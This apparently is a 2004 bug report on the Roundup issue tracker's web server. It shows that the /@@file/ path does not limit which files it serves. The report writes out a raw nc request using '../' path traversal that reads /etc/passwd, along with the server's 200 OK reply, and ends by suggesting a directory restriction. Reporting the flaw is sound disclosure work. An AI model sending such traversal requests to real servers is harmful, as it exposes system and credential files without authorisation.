Roundup uses /home/@@file/ prefix to get static files
from the filesystem. It does not restrict in any way
the files that are handled.

I have a roundup tracker home at /home/kent/cit, then I
do the following:

kent@kent:~$ nc localhost 8080
GET /cit/@@file/../../../../etc/passwd HTTP/1.0
Host: kent

HTTP/1.0 200 OK
Server: BaseHTTP/0.3 Python/2.3.3
Date: Thu, 27 May 2004 11:47:04 GMT
Last-Modifed: Tue, 18 May 2004 14:00:15 GMT
Content-Length: 1088
Content-Type: text/plain
Pragma: no-cache

and my actual /etc/passwd follows.

Perhaps roundup web interface should restrict @@file
requests to some directory.